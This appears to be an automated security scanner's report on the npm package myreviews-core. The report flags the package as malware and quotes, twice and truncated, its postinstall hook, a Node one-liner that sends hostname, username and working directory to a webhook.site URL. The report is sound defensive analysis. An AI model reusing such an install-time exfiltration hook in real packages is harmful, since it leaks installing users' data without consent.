AI Security Review
scanned 2h ago · by lpm-firewall-aiInstalling the package automatically transmits local host and user metadata to a third-party webhook. The behavior is unrelated to the empty package entrypoint.
Static reason
High-risk behavior combination matched malicious policy.
Trigger
Automatic npm `postinstall` during package installation.
Impact
Leaks hostname, username, working directory, and installation timing to a remote endpoint.
Mechanism
Install-time HTTPS metadata exfiltration via inline Node command.
Attack narrative
On npm installation, `package.json` executes an inline Node command through `postinstall`. It collects `os.hostname()`, `os.userInfo().username`, `process.cwd()`, and a timestamp, then sends them as query parameters to a `webhook.site` URL. The package's `index.js` exports only an empty object, providing no legitimate functionality that explains this automatic collection and transmission.
Rationale
Direct source inspection confirms an unconsented install-time exfiltration request. The empty entrypoint makes the telemetry behavior clearly malicious rather than package-aligned.
Evidence
package.jsonindex.js
Network endpoints1
webhook.site/ac3b6fd3-80b7-41ee-9d43-f8b815959005
Decision evidence
public snapshotAI called this Malicious at 99.0% confidence as Malware with low false-positive risk.
Evidence for block
- `package.json` defines an automatic `postinstall` hook.
- The hook runs `node -e` and sends an HTTPS request to `webhook.site`.
- The request includes hostname, local username, current working directory, and timestamp.
- `index.js` is empty, so the install hook is the package's only meaningful behavior.
Evidence against
- No additional source files, payload loader, or legitimate runtime functionality were found.
Behavioral surface
Trivial
Source & flagged code
2 flagged · loading sourcepackage.jsonView file
•scripts.postinstall = node -e "require('https').get('https://webhook.site/ac3b6fd3-80b7-41ee-9d43-f8b815959005?pkg=myreviews-core&host='+require('os').hostname()+'&user='+require('os').userInfo().userna...
Critical
Red Install Lifecycle Script
Install-time lifecycle script matches a deterministic static-gate block pattern.
package.jsonView on unpkg•scripts.postinstall = node -e "require('https').get('https://webhook.site/ac3b6fd3-80b7-41ee-9d43-f8b815959005?pkg=myreviews-core&host='+require('os').hostname()+'&user='+require('os').userInfo().userna...
High
Install Time Lifecycle Scripts
Package defines install-time lifecycle scripts.
package.jsonView on unpkgFindings
1 Critical1 High1 Low
CriticalRed Install Lifecycle Scriptpackage.json
HighInstall Time Lifecycle Scriptspackage.json
LowScripts Present